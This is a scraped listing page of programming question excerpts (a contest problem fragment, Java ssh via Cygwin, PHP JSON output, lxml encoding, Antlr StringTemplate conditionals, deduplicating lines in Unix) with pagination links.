The integer ti is the time at which the observation has been made (1 <= ti <= t), and Li, Ti, Ri, Bi are the left, top, right and bottom respectively of the (rectangular) area which has been observed. (1 <= Li <= Ri <= W, 1 <= Ti <= Bi <= H; the point (1, 1) is the upper left hand corner, and (W, H) is the lower right hand corner of the city.) The messages mean that the robber was not in the given rectangle at time ti. The input is terminated by a test case starting with W = H = t = 0. This case should not be processed. Output For each robbery, first output the line "Robbery #k:", where k is the number of the robbery. Then, there are three possibilities: If it is impossible that the robber is still in the city considering the messages, output the line "The robber has escaped." In all other cases, assume that the robber really is in the city. Output one line of the form "Time step : The robber has been at x,y." for each time step, in which the exact location can be deduced. (x and y are the column resp. row of the robber in time step .) Output these lines ordered by time . If nothing can be deduced, output the line "Nothing known." and hope that the inspector will not get even more angry. Output a blank line after each processed case.

    Read the article

  • Send and recieve multiple ssh commands via java runtime and cygwin

    - by Moustachio
    Hey I have run into the following problem when attempting to build a program in java which executes commands on a remote linux server and returns the output for processing... Basically I have installed Cygwin with an SSH client and want to do the following: Open Cygwin, Send command "user@ip"; Return output; Send command "password"; Return output; Send multiple other commands, Return output; ...etc... So far: Process proc = Runtime.getRuntime().exec("C:/Power Apps/Cygwin/Cygwin.bat"); Works nicely except I am at a loss as to how to attempt the next steps. Any help?

    Read the article

  • is this valid json array using php

    - by Rich
    Hello, I need to convert some code done by someone else, to work in my mvc model It is using some functions like EOD that I don't understand. Does that still work in a class? Primarely, my question focusus on the json output. The old code does not use the php json_encode function, but outputs it directly like this ?> { "username": "<?php echo $_SESSION['username'];?>", "items": [ <?php echo $items;?> ] } <?php I would do it like this, but I need to be sure it's right for the items part header('Content-type: application/json'); $output = array("username"=> isset( $_SESSION['username'] ) ? $_SESSION['username'] : "?", "items"=>$items ); $this->content = json_encode($output); This is some background on how the $items is made. An item is stored like this: $_SESSION['chatHistory'][$_POST['to']] .= <<<EOD { "s": "1", "f": "{$to}", "m": "{$messagesan}" }, EOD; and it is put in the $items variable like this $items = ''; if ( !empty($_SESSION['openChatBoxes'] ) ) { foreach ( $_SESSION['openChatBoxes'] as $chatbox => $void ) { $items .= $this->chatBoxSession($chatbox); } } //The chatBoxSession() function takes an item from the $_SESSION['chatHistory'] array and returns it. I hope this was somewhat clear enough? The php manual warns that in some cases you don't get an array output, instead you get an object. So, with the EOD syntax, I am not really sure. It could save me some time if I know some things are doing what they supposed too, and giving the right output. thanks, Richard

    Read the article

  • Encoding in python with lxml - complex solution

    - by Vojtech R.
    Hi, I need to download and parse webpage with lxml and build UTF-8 xml output. I thing schema in pseudocode is more illustrative: from lxml import etree webfile = urllib2.urlopen(url) root = etree.parse(webfile.read(), parser=etree.HTMLParser(recover=True)) txt = my_process_text(etree.tostring(root.xpath('/html/body'), encoding=utf8)) output = etree.Element("out") output.text = txt outputfile.write(etree.tostring(output, encoding=utf8)) So webfile can be in any encoding (lxml should handle this). Outputfile have to be in utf-8. I'm not sure where to use encoding/coding. Is this schema ok? (I cant find good tutorial about lxml and encoding, but I can find many problems with this...) I need robust approved solution so I ask you seniors. Many thanks

    Read the article

  • Conditionals in Antlr String Templates

    - by Pat Long - Munkii Yebee
    We are using Antlr StringTemplates to give control over how a Entity's Name is output. The basic Stringtemplate is $FirstName$ $Initial$ $LastName$, $Suffix$, $Degree$ I want to add some smarts to that template so that the commas are only output when necessary i.e. The first comma is only output when there is a Suffix or Degree and the second commas is only output if there is a suffix. I tried the following template string bit it does not work. I guess I have misunderstood $FirstName$ $Initial$ $LastName$ <if(Suffix|Degree)>,<endif>, $Suffix$ <if(Suffix)>,<endif> $Degree$ If it helps we process the templates using this C# StringTemplate stringtemplate = new Antlr.StringTemplate.StringTemplate(template.Data); foreach (Pair<string, string> pair in dictionary) { if (pair.First != null && pair.Second != null) { stringtemplate.SetAttribute(pair.First, pair.Second); } } return stringtemplate.ToString();

    Read the article

  • unix tool to remove duplicate lines from a file

    - by Nathan Fellman
    I have a tool that generates tests and predicts the output. The idea is that if I have a failure I can compare the prediction to the actual output and see where they diverged. The problem is the actual output contains some lines twice, which confuses diff. I want to remove the duplicates, so that I can compare them easily. Basically, something like sort -u but without the sorting. Is there any unix commandline tool that can do this?

    Read the article

< Previous Page | 124 125 126 127 128 129 130 131 132 133 134 135  | Next Page >